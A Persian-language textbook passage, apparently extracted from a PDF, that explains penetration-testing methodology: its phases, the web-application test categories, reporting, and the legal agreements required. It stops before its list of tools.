Pen tester ، وﺿﻌﻴﺖ اﻣﻨﻴﺘﻲ ﺳﺎزﻣﺎن را ﻣﻮرد ارزﻳﺎﺑﻲ ﻗﺮار ﻣﻲ دﻫﺪ ﺗﺎ ﻧﺘﺎﻳﺞ ﺣﻤﻠﻪ واﻗﻌﻲ ﻳﻚ ﻫﻜﺮ را آﺷﻜﺎر ﻛﻨﺪ . ارزﻳﺎﺑﻲ ﻫﺎي اﻣﻨﻴﺘﻲ، ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ ﻋﻨﻮان ﺑﺮرﺳﻲ ﻫﺎي اﻣﻨﻴﺘﻲ، ارزﻳ ﺎﺑﻲ آﺳﻴﺐ ﭘﺬﻳﺮي، ﻳﺎ ﺗﺴﺖ ﻧﻔﻮذ دﺳﺘﻪ ﺑﻨﺪي ﺷﻮﻧﺪ . ﻫﺮ ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ، ﻣ ﺴﺘ ﻠﺰم اﻳﻦ اﺳﺖ ﻛﻪ اﻓﺮادي ﻛﻪ ارزﻳﺎﺑﻲ را اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ، ﻣﻬﺎرت ﻫﺎي ﻣﺨﺘﻠﻔﻲ داﺷﺘﻪ ﺑﺎﺷﻨﺪ . .

ﺑﺎزرﺳﻲ اﻣﻨﻴﺘﻲ و ارزﻳﺎﺑﻲ آﺳﻴﺐ ﭘﺬﻳﺮي، ﺷﺒﻜﻪ ﻫﺎي IP و ﺳﻴﺴﺘﻢ ﻫﺎ را ﺟﻬﺖ ﻳﺎﻓﺘﻦ ﻣﺸﻜﻼت اﻣﻨﻴﺘﻲ ﺷﻨﺎﺧﺘﻪ ﺷﺪه اﺳﻜﻦ ﻣﻲ ﻛﻨﻨﺪ . آﻧﻬﺎ اﻳﻦ ﻛﺎر را ﺑﺎ اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻫﺎي ﻓﻌﺎل، ﻛﺎرﺑﺮان، و ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎ و ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻫﺴﺘﻨﺪ اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ . .

ارزﻳﺎﺑﻲ آﺳﻴﺐ ﭘﺬﻳﺮي ﻳﺎ اﻣﻨﻴﺘﻲ، ﺗﻨﻬﺎ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺑﺎﻟﻘﻮه را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﻨﺪ در ﺣﺎﻟﻴﻜﻪ ﺗﺴﺖ ﻧﻔﻮذ در واﻗ ﻊ ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ اﺳﺖ . ﻣﺜﺎﻟﻲ ا ز ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ، ﺑﺮرﺳﻲ درب دورو ي اﺳﺖ ﻛﻪ اﮔﺮ ﺑﺎز ﺑﺎﺷﺪ آﻳﺎ ﻛﺴﻲ ﻣﻲ ﺗﻮاﻧﺪ دﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎز ﭘﻴﺪا ﻛﻨﺪ ﻳﺎ ﻧﻪ . در ﺗﺴﺖ ﻧﻔﻮذ، ﺗﻼش ﻣﻲ ﺷﻮد ﺗﺎ درب ﺑﺎز ﺷﻮد ﺗﺎ ﻧﺘﺎﻳﺞ آن روﻳﺖ ﺷﻮد . ﺗﺴﺖ ﻧﻔﻮذ، ﺷﺎﺧﺺ ﺧﻮﺑﻲ از ﺿﻌﻒ ﻫﺎي ﺷﺒﻜﻪ ﻳﺎ ﺳﻴﺴﺘﻢ ﻫﺎ اﺳﺖ اﻣﺎ ﺑﺴﻴﺎر ﺗﻬﺎﺟﻤﻲ اﺳﺖ و ﺑﻨﺎﺑﺮاﻳﻦ، اﺣﺘﻤﺎل ﺗﺨﺮﻳﺐ ﺳﺮو ﻳﺲ ﻫﺎي ﺷﺒﻜﻪ وﺟﻮد دارد . .

230

روش ﻫﺎي ﺗﺴﺖ ﻧﻔﻮذ

دو ﻧﻮع ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ وﺟﻮد دارد : ارزﻳﺎﺑﻲ ﺧﺎرﺟﻲ و داﺧﻠﻲ . ارزﻳﺎﺑﻲ ﺧﺎرﺟﻲ، اﻃﻼﻋﺎت ﻋﻤﻮﻣﻲ ﻗﺎﺑﻞ دﺳﺘﺮس را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ، اﺳﻜﻦ ﺷﺒﻜﻪ را اﻧﺠﺎم ﻣﻲ دﻫﺪ و اﻛﺴﭙﻠﻮﻳﺖ ﻫﺎ را از ﻣﺤﻴﻂ ﺧﺎرج از ﺷﺒﻜﻪ، و ﻣﻌﻤﻮﻻ از ﻃﺮﻳﻖ اﻳﻨﺘﺮﻧﺖ اﺟﺮا ﻣﻲ ﻛﻨﺪ . ارزﻳﺎﺑﻲ داﺧﻠﻲ، از داﺧﻞ ﺷﺒﻜﻪ ﺳﺎزﻣﺎن اﺗﻔﺎق ﻣﻲاﻓﺘﺪ اﻣﺎ ﺗﺴﺖ ﻛﻨﻨﺪه ﺑﻪ ﻋﻨﻮان ﻛﺎرﻣﻨﺪ ﻛﻪ ﻣﻘﺪار ﻛﻤﻲ ﺑﻪ ﺷﺒﻜﻪ دﺳﺘﺮﺳﻲ دارد، ﻳﺎ ﻫﻜﺮ ﻛﻼه ﺳﻴﺎﻫﻲ ﻛﻪ ﻫﻴﭻ داﻧﺸﻲ از ﻣﺤﻴﻂ ﻧﺪارد، ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ . .

ﻻﻮﻤﻌﻣ ﺗﺴﺖ ﻧﻔﻮذ ﺟﻌﺒﻪ ﺳﻴﺎه، رﻳﺴﻚ ﺑﺎﻻﻳﻲ .ﺪﻧراد ﺗﻴﻢ، ﺑﺎﻳﺪ ﺑﺮﻧﺎﻣﻪ ﻫﻤﺎﻫﻨﮕﻲ را ﺑﺮاي اﺳﺘﻔﺎده ﺑﻬﻴﻨﻪ از ﻣﻨﺎﺑﻊ و زﻣﺎن ﻃﺮاﺣﻲ ﻛﻨﻨﺪ . .

اﮔﺮ ﺷﻤﺎ داﻧﺶ و ﺗﺠﺮﺑﻪ ﻛﺎﻓﻲ ﺑﺮاي اﻧﺠﺎم ﺗﺴﺖ ﻧﻔﻮذ ﻧﺪارﻳﺪ، ﻣﻲ ﺗﻮاﻧﻴﺪ آن را outsource ﻛﻨﻴﺪ . ﺳﺎزﻣﺎﻧﻲ ﻛﻪ ﺷﺮاﻳﻂ ارزﻳﺎﺑﻲ را ﻣﺸﺨﺺ ﻣﻲ ﻛﻨﺪ ﺑﺎﻳﺪ ﻣﺤﺪوده ارزﻳﺎﺑﻲ را ﻣﺸﺨﺺ ﻛﻨﺪ . ﻳﻌﻨﻲ ﭼﻴﺰﻫﺎﻳﻲ ﻛﻪ ﺑﺎﻳﺪ و ﻧﺒﺎﻳﺪ ﺗﺴﺖ ﺷﻮﻧﺪ را ﺑﺎﻳﺪ ﻣﺸﺨﺺ ﻛﻨﺪ . ﺑﺮاي ﻣﺜﺎل، ﻣﻤﻜﻦ اﺳﺖ ﻣﻘﺮر ﺷﻮد ﻛﻪ ﺗﻨﻬﺎ 10 ﺳﻴﺴﺘﻢ از DMZ ﻣﻮرد ارزﻳﺎﺑﻲ ﻗﺮار ﮔﻴﺮد . در ﻣﺤﺪوده ﻛﺎري، ﺑﺎﻳﺪ SLA ﺗﻌﺮﻳﻒ ﺷﻮد ﺗﺎ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ در زﻣﺎن ﻣﺨﺘﻞ ﺷﺪن ﺳﺮوﻳﺲ ﺑﺎﻳﺪ اﻧﺠﺎم ﺷﻮﻧﺪ، ﺗﻌﻴﻴﻦ ﺷﻮﻧﺪ . .

ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ ﻳﺎ ﺗﺴﺖ ﻧﻔﻮذ، ﻣﻲ ﺗﻮاﻧﺪ ﺑﺼﻮرت دﺳﺘﻲ و ﺑﺎ اﺑﺰارﻫﺎي راﻳﮕﺎن ﻣﺨﺘﻠﻒ اﻧﺠﺎم ﺷﻮد . دﻳﺪﮔﺎه دﻳﮕﺮ اﻳﻦ اﺳﺖ ﻛﻪ از اﺑﺰارﻫﺎي ﮔﺮان ﻗﻴﻤﺖ اﺗﻮﻣﺎﺗﻴﻚ اﺳﺘﻔﺎده ﺷﻮد . ﮔﺎﻫﻲ اوﻗﺎت، ارزﻳﺎﺑﻲ وﺿﻌﻴﺖ اﻣﻨﻴﺘﻲ ﺑﺎ اﺳﺘﻔﺎده از ﺗﺴﺖ دﺳﺘﻲ، ﻧﺴﺒﺖ ﺑﻪ اﺳﺘﻔﺎده از اﺑﺰارﻫﺎي اﺗﻮﻣﺎﺗﻴﻚ، ﮔﺰﻳﻨﻪ ﺑﻬ ﺘﺮي اﺳﺖ . دﻳﺪﮔﺎه اﺗﻮﻣﺎﺗﻴﻚ، ﺳﺮﻳﻌﺘﺮ و راﺣﺖ ﺗﺮ اﺳﺖ اﻣﺎ ﻣﻤﻜﻦ اﺳﺖ ﺑﺮﺧﻲ از ﺑﺎزرﺳﻲ ﻫﺎ ا مﺎﺠﻧ ﺸﻧ ﺪﻧﻮ در ﺣﺎﻟﻴﻜﻪ، در ور ش دﺳﺘﻲ، ﻧﻴﺎز ﺑﻪ ﺑﺮﻧﺎﻣﻪ رﻳﺰي، زﻣﺎﻧﺒﻨﺪي، و ﻣﺴﺘﻨﺪ ﺳﺎزي ﺑﺎ ﺻﺒﺮ و ﺣﻮﺻﻠﻪ دارد . .

ﻣﺮاﺣﻞ ﺗﺴﺖ ﻧﻔﻮذ

ﺗﺴﺖ ﻧﻔﻮذ ﺷﺎﻣﻞ ﺳﻪ ﻣﺮﺣﻠﻪ اﺳﺖ : :

• ﻣﺮﺣﻠﻪ ﭘﻴﺶ از ﺣﻤﻠﻪ ( pre-attack) • ﻣﺮﺣﻠﻪ ﺣﻤﻠﻪ ( attack) • ﻣﺮﺣﻠﻪ ﭘﺲ از ﺣﻤﻠﻪ ( post-attack ) )

231

ﻣﺮﺣﻠﻪ ﭘﻴﺶ از ﺣﻤﻠﻪ، ﺷﺎﻣﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻳﺎ ﺟﻤﻊ آوري داده اﺳﺖ . اﻳﻦ اوﻟﻴﻦ ﻣﺮﺣﻠﻪ ﺑﺮاي ﺗﺴﺖ ﻧﻔﻮذ اﺳﺖ . ﺟﻤﻊ آوري داده ﻫﺎ از ﻃﺮﻳﻖ DNS ، Whois ، و اﺳﻜﻦ ﺷﺒﻜﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﺷﻤﺎ در ﻳﺎﻓﺘﻦ ﻫﺪﻓﻲ ﻛﻪ داراي اﻃﻼﻋﺎت ﺑﺎ ارز ﺷﻲ اﺳﺖ ﻛﻤﻚ ﻛﻨﺪ ( ﺑﺪون در ﻧﻈﺮ ﮔﺮﻓﺘﻦ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺑﺮﻧﺎﻣﻪ ﻫﺎي در ﺣﺎل اﺟﺮا ﺑﺮ روي ﺳﻴﺴﺘﻢ ). ﺗﺴﺖ ﻧﻔﻮذ ﺷﺎﻣﻞ اﺳﺘﻔﺎده از ﻧﺎم داﻣﻨﻪ ﻳﺎ IP در Whois ﺑﺮاي ﭘﻴﺪا ﻛﺮدن اﻃﻼﻋﺎت ﺗﻤﺎس اﺷﺨﺎص، و اﻃﻼﻋﺎت ﺳﻴﺴﺘﻢ ﻫﺎ اﺳﺖ ﻛﻪ ﺑﻌﺪا ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي اﻳﺠﺎد دﻳﺎﮔﺮام ﺟﺰﺋﻲ از ﺷﺒﻜﻪ و ﺷﻨﺎﺳﺎﻳﻲ ﻫﺪف ﻛﻤﻚ ﻛﻨﺪ . ﺷﻤﺎ ﺑﺎﻳﺪ دﺳﺘﮕﺎه ﻫﺎي ﻓﻴﻠﺘﺮﻳﻨﮓ ﺷﺒﻜﻪ را ﺗﺴﺖ ﻛﻨﻴﺪ ﺗﺎ ﺗﺮاﻓﻴﻚ ﻗﺎﻧﻮﻧﻲ، ﭘﺮوﻛﺴﻲ ﺳﺮورﻫﺎ، و ... را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻴﺪ و ﻧﺼﺐ ﭘﻴﺶ ﻓﺮض ﻓﺎﻳﺮوال ﻫﺎ را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﭘﺴﻮردﻫﺎي ﭘﻴﺶ ﻓﺮض، ﻏﻴﺮ ﻓﻌﺎل ﺷﺪه اﻧﺪ ﻳﺎ ﺗﻐﻴﻴﺮ ﻛﺮده اﻧﺪ و ﻧﻴﺰ اﺟﺎزه دﺳﺘﺮﺳﻲ از راه دور وﺟﻮد ﻧﺪارد . ﭘﺲ اﻃﻼﻋﺎﺗﻲ ﻛﻪ در اﻳﻦ ﻣﺮﺣﻠﻪ ﺑﺪﺳﺖ ﻣﻲ آﻳﻨﺪ ﻋﺒﺎرﺗﻨﺪ از : :

• ﻣﻜﺎن ﻓﻴﺰﻳﻜﻲ و ﻣﻨﻄﻘﻲ ﺳﺎزﻣﺎن • ارﺗﺒﺎﻃﺎت آﻧﺎﻟﻮگ • اﻃﻼﻋﺎت ﺗﻤﺎس ﻫﺎ • اﻃﻼﻋﺎت درﺑﺎره ﺳﺎزﻣﺎن ﻫﺎي دﻳﮕﺮ • اﻃﻼﻋﺎت دﻳﮕﺮي ﻛﻪ ﺑﺮاي ﻫﻚ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ

ﻣﺮﺣﻠﻪ ﺑﻌﺪي، ﺣﻤﻠﻪ اﺳﺖ . در اﻳﻦ ﻣﺮﺣﻠﻪ، اﺑﺰارﻫﺎ ﻣﻤﻜﻦ اﺳﺖ ﺗﺨﺮﻳﺒﻲ ( exploitive ) ﻳﺎ واﻛﻨﺸﻲ ( responsive ) ﺑﺎﺷﻨﺪ . اﻳﻦ اﺑﺰارﻫﺎ ﺗﻮﺳﻂ ﻫﻜﺮﻫﺎي ﺣﺮﻓﻪ اي ﺑﺮاي ﻣﺎﻧﻴﺘﻮر و ﺗﺴﺖ ﻛﺮدن اﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﻫﺎ و ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ . ﻓﻌﺎﻟﻴﺖ ﻫﺎي زﻳﺮ ﺟﺰ ﻣﺮاﺣﻞ ﺣﻤﻠﻪ ﻫﺴﺘﻨﺪ وﻟﻲ ﻓﻘﻂ ﺑﻪ اﻳﻦ ﻣﻮارد ﻣﺤﺪود ﻧﻤﻲ ﺷﻮد : :

ﻧﻔﻮذ ﺑﻪ ﻣﺤﻴﻂ ( perimeter :) ﺷﺎﻣﻞ ﺑﺮرﺳﻲ ﮔﺰارﺷﺎت ﺧﻄﺎ، ﻛﻨﺘﺮل ﻫﺎي دﺳﺘﺮﺳﻲ ( ACL ) و ﻓﻴﻠﺘﺮﻳﻨﮓ ﭘﺮوﺗﻜﻞ ﻫﺎ ﺑﺎ اﺳﺘﻔﺎده از ﺑﺮﺧﻲ ﭘﺮوﺗﻜﻞ ﻫﺎ از ﻗﺒﻴﻞ FTP ، SSH ، و Telnet اﺳﺖ . ﻫﻤﭽﻨﻴﻦ ﺗﺴﺖ ﻛﻨﻨﺪه ﺑﺎﻳﺪ ﺣﻤﻼت buffer

232

DoS ، SQL injection ، overflow و ... را ﻧﻴﺰ ﺗﺴﺖ ﻛﻨﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، ﺑﺮاي ﺗﺴﺖ ﻧﺮم اﻓﺰار، ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺮاي ﺗﺴﺖ وب اﭘﻠﻴﻜﺸﻦ ﻫﺎي داﺧﻠﻲ، و ﭘﻴﻜﺮﺑﻨﺪي ﻫﺎي واﻳﺮﻟﺲ، زﻣﺎن ﺻﺮف ﻛﻨﻴﺪ ﺑﺮاي اﻳﻨﻜﻪ، اﻣﺮوزه، ﺗﻬﺪﻳﺪ داﺧﻠﻲ ﺑﺰرﮔﺘﺮﻳﻦ ﺗﻬﺪﻳﺪ اﻣﻨﻴﺘﻲ اﺳﺖ . .

ﺗﺴﺖ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب: ﺑﺮﺧﻲ از ﺗﺴﺖ ﻫﺎﻳﻲ ﻛﻪ ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ ﻋﺒﺎرﺗﻨﺪ از : :

• Input Validation: ﺷﺎﻣﻞ LDAP ، SQL injection ، script injection ، OS command injection injection ، و cross site scripting.

• Output Sanitization: ﺷﺎﻣﻞ وارد ﻛﺮدن ﻛﺎراﻛﺘﺮﻫﺎي ﻣﺨﺼﻮص و ﺑﺮرﺳﻲ ﺧﻄﺎﻫﺎﻳﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻣﻲ دﻫﺪ.

• Access Control: دﺳﺘﺮﺳﻲ ﺑﻪ اﻳﻨﺘﺮﻓﻴﺲ ﻫﺎي ﻣﺪﻳﺮﻳﺘﻲ را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ و داده ﻫﺎ را ﺑﻪ ﻓﻴﻠﺪﻫﺎي ﻓﺮم ﻫﺎ ارﺳﺎل ﻣﻲ ﻛﻨﺪ، اﺳﻜﺮﻳﭙﺖ ﻫﺎي ﺳﻤﺖ ﻛﻼﻳﻨﺖ را ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﺪ و ...

• Checking for Buffer Overflow: ﺷﺎﻣﻞ ﺗﺴﺖ ﻫﺎي heap overflow ، stack overflow ، و format string overflow اﺳﺖ.

• Denial of Service: ﺗﺴﺖ ﺣﻤﻼت DoS ﺑﺎ روﺷﻬﺎﻳﻲ از ﻗﺒﻴﻞ ورودي ﻧﺎﻗﺺ، ﻗﻔﻞ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺧﺎﻃﺮ ﺑﺎر ﺗﺮاﻓﻴﻜﻲ زﻳﺎد، درﺧﻮاﺳﺖ ﻫﺎي ﺗﺮاﻛﻨﺶ، ﻳﺎ درﺧﻮاﺳﺖ ﻫﺎي زﻳﺎد ﺑﻪ ﺑﺮﻧﺎﻣﻪ اﻧﺠﺎم ﻣﻲ ﺷﻮد.

• Compnent Checking: ﻛﻨﺘﺮل ﻫﺎي اﻣﻨﻴﺘﻲ روي ﻣﻮﻟﻔﻪ ﻫﺎي وب ﺳﺮورﻫﺎ، را ﺗﺴﺖ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ آﺳﻴﺐ ﭘﺬﻳﺮ ﺑﻮدن ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب را ﻧﺸﺎن دﻫﺪ.

• Confidentiality Check: ﺑﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎﻳﻲ ﻛﻪ از ﭘﺮوﺗﻜﻞ ﻫﺎ و رﻣﺰﮔﺬاري اﻣﻦ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ، اﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ در اﺳﺘﻔﺎده از اﻟﮕﻮرﻳﺘﻢ ﺿﻌﻴﻒ ﻳﺎ ﻣﻜﺎﻧﻴﺰم ﻣﺒﺎدﻟﻪ، ﺻﻮرت ﻣﻲ ﮔﻴﺮد را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ.

• Session Management: ﺷﺎﻣﻞ ﺑﺮرﺳﻲ ﺻﺤﺖ ﺗﻮﻛﻦ ﻫﺎي ﻧﺸﺴﺖ، ﻃﻮل ﺗﻮﻛﻦ ﻫﺎ، و اﻧﻘﻀﺎي ﺗﻮﻛﻦ ﻫﺎي ﻧﺸﺴﺖ در اﻧﺘﻘﺎل از ﻣﻨﺎﺑﻊ SSL ﺑﻪ ﻏﻴﺮ SSL ، و وﺟﻮد ﺗﻮﻛﻦ ﻫﺎي ﻧﺸﺴﺖ در history ﻳﺎ cashe ﻣﺮورﮔﺮ اﺳﺖ.

ﺑﺪﺳﺖ آوردن ﻫﺪف: اﻳﻦ ﻣﺠﻤﻮﻋﻪ از ﻓﻌﺎﻟﻴﺖ ﻫﺎ، ﺑﺴﻴﺎر ﺗﻬﺎﺟﻤﻲ ﺗﺮ از اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺴﺘﻨﺪ . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ از ﻳﻚ اﺑﺰار اﺗﻮﻣﺎﺗﻴﻚ اﻛﺴﭙﻠﻮﻳﺖ ﻣﺜﻞ CORE IMPACT ، ﻳﺎ از ﻃﺮﻳﻖ اﻃﻼﻋﺎﺗﻲ ﻛﻪ ار ﻃﺮﻳﻖ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﺑﺪﺳﺖ ﻣﻲ آورﻳﺪ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ اﻟﺰام ﺑﻪ اﺟﺮاي ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ، ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ﺑﻪ روش brute-force ، ﻳﺎ اﺑﺰارﻫﺎي ﮔﺮﻓﺘﻦ دﺳﺘﺮﺳﻲ را ﺗﺴﺖ ﻛﻨﻴﺪ . .

اﻓﺰاﻳﺶ دﺳﺘﺮﺳﻲ: زﻣﺎﻧﻴﻜﻪ اﻛﺎﻧﺖ ﻛﺎرﺑﺮ درﺧﻮاﺳﺖ ﻣﻲ ﺷﻮد، ﺗﺴﺖ ﻛﻨﻨﺪه ﻣﻲ ﺗﻮاﻧﺪ ﺳﻌﻲ ﻛﻨﺪ ﻛﻪ دﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮي ﺑﻪ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ را ﺑﻪ آن دﻫﺪ . ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي ﻫﻚ، ﻣﻲ ﺗﻮاﻧﻨﺪ از آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺳﻴﺴﺘﻢ ﺑﺮاي اﻛﺴﭙﻠﻮﻳﺖ ﻛﺮدن و اﻳﺠﺎد ﺣﺴﺎب ﻛﺎرﺑﺮي ﺟﺪﻳﺪ ﺑﺎ دﺳﺘﺮﺳﻲ administrator اﺳﺘﻔﺎده ﻛﻨﻨﺪ . .

233

اﺟﺮ :ا آﺧﺮﻳﻦ ﻣﺮﺣﻠﻪ اﺳﺖ . ﻣﻬﺎرت ﻫﻚ ﺷﻤﺎ ﺑﺎ اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ ﺑﺮ روي ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ ﺑﺎ در ﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻋﺪم ﺗﻮﻗﻒ ﻓﺮآﻳﻨﺪﻫﺎي ﺗﺠﺎري، ﺑﻪ ﭼﺎﻟﺶ ﻛﺸﻴﺪه ﻣﻲ ﺷﻮد . ﻧﺸﺎﻧﻪ ﮔﺬاري ﻛﺮدن ( leaving a mark) ، ﻧﺸﺎن ﻣﻲ دﻫﺪ ﻛﻪ ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﺴﺘﻴﺪ دﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮي ﺑﻪ ﻣﻨﺎﺑﻊ ﭘﻴﺪا ﻛﻨﻴﺪ . ﺑﺴﻴﺎري از ﺷﺮﻛﺖ ﻫﺎ، ﻧﻤﻲ ﺧﻮاﻫﻨﺪ ﻛﻪ ﺷﻤﺎ اﻳﻨﻜﺎر را اﻧﺠﺎم دﻫﻴﺪ ﻳﺎ ﻛﺪﻫﺎي ﻣﻮرد دﻟﺨﻮاه ﺧﻮد را اﺟﺮا ﻛﻨﻴﺪ . ﺑﻨﺎﺑﺮاﻳﻦ، اﻳﻦ ﻗﺒﻴﻞ ﻣﺤﺪودﻳﺖ ﻫﺎ وﺟﻮد دارﻧﺪ و ﭘﻴﺶ از اﻧﺠﺎم ﺗﺴﺖ، ﻋﻨﻮان ﻣﻲ ﺷﻮﻧﺪ . .

ﻣﺮﺣﻠﻪ ﭘﺲ از ﺣﻤﻠﻪ، ﺷﺎﻣﻞ ﺑﺎزﻳﺎﺑﻲ ﺳﻴﺴﺘﻢ ﺑﻪ ﭘﻴﻜﺮﺑﻨﺪي ﻫﺎي ﭘﻴﺶ از ﺣﻤﻠﻪ اﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﭘﺎك ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ ، ﻫﺎ ﺣﺬف ورودي ﻫﺎي رﺟﻴﺴﺘﺮي، ﭘﺎك ﻛﺮدن ﺗﻤﺎم اﺑﺰارﻫﺎ و اﻛﺴﭙﻠﻮﻳﺖ ﻫﺎ از ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺴﺖ ﺷﺪه، و ﭘﺎك ﻛﺮدن ارﺗﺒﺎﻃﺎت اﺳﺖ . .

ﻧﻬﺎﻳﺘﺎ، ﺷﻤﺎ ﺗﻤﺎم ﻧﺘﺎﻳﺞ را ﺗﺤﻠﻴﻞ ﻣﻲﻛﻨﻴﺪ و آن را در ﻗﺎﻟﺐ ﮔﺰارﺷﻲ ﻛﺎﻣﻞ ﺑﻪ ﻣﺪﻳﺮﻳﺖ اراﺋﻪ ﻣﻲ دﻫﻴﺪ . اﻳﻦ ﮔﺰارش ﺷﺎﻣﻞ اﻫﺪاف ﺷﻤﺎ، ﻣﺸﺎﻫﺪات ﺷﻤﺎ، ﺗﻤﺎم ﻓﻌﺎﻟﻴﺖ ﻫﺎي ﺻﻮرت ﮔﺮﻓﺘﻪ، و ﻧﺘﺎﻳﺞ اﻳﻦ ﻓﻌﺎﻟﻴﺖ ﻫﺎ اﺳﺖ و ﻣﻤﻜﻦ اﺳﺖ ﺷﺎﻣﻞ روش ﻫﺎﻳﻲ ﺑﺮاي ﺑﺮﻃﺮف ﻛﺮدن آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ﺑﺎﺷﺪ . .

ﭼﺎرﭼ ﻮب ﻗﺎﻧﻮﻧﻲ ﺗﺴﺖ ﻧﻔﻮذ

ﺷﺨﺼﻲ ﻛﻪ ﺗﺴﺖ ﻧﻔﻮذ را اﻧﺠﺎم ﻣﻲ دﻫﺪ، ﺑﺎﻳﺪ از ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻫﻚ ﻳﻚ ﺷﺒﻜﻪ آﮔﺎه ﺑﺎﺷﺪ ﺣﺘﻲ ﻫﻚ ﻗﺎﻧﻮﻧﻤﻨﺪ . ﻣﺴﺘﻨﺪاﺗﻲ ﻛﻪ ﻳﻚ ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ ﺑﺎ ﻣﺸﺘﺮي ﺑﺮاي اﻧﺠﺎم ﺗﺴﺖ ﻧﻔﻮذ اﻣﻀﺎ ﻛﻨﺪ، ﺑﻪ ﺷﺮح زﻳﺮ ﻫﺴﺘﻨﺪ : :

• ﻣﺤﺪوده ﻛﺎري، ﺑﺮاي ﺗﻌﻴﻴﻦ اﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰي ﺑﺎﻳﺪ ﺗﺴﺖ ﺷﻮد • ﺗﻮاﻓﻖ ﻧﺎﻣﻪ ﻋﺪم اﻓﺸﺎي اﻃﻼﻋﺎت ( NDA) ، در ﺷﺮاﻳﻄﻲ ﻛﻪ ﺗﺴﺖ ﻛﻨﻨﺪه، اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ را ﺑﺒﻴﻨﺪ • ﺗﻌﻬﺪ، ﺑﻪ اﻳﻨﻜﻪ ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ، از اﻧﺠﺎم ﻋﻤﻠﻴﺎت ﺧﺮاﺑﻜﺎراﻧﻪ ﺧﻮدداري ﺧﻮاﻫﺪ ﻛﺮد

اﺑﺰارﻫﺎي ﺧﻮدﻛﺎر ﺗﺴﺖ ﻧﻔﻮذ

ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻛﻪ در زﻣﻴﻨﻪ اﺑﺰارﻫﺎي ﺗﺴﺖ ﻧﻔﻮذ در ﺳﺎل 2006 اﻧﺠﺎم ﺷﺪه اﺳﺖ، ده اﺑﺰار زﻳﺮ را ﺑﻪ ﻋﻨﻮان ﺑﻬﺘﺮﻳﻦ اﺑﺰارﻫﺎي ﺗﺴﺖ ﻧﻔﻮذ ﻣﻌﺮﻓﻲ ﻛﺮده :اﻧﺪ :اﻧﺪ

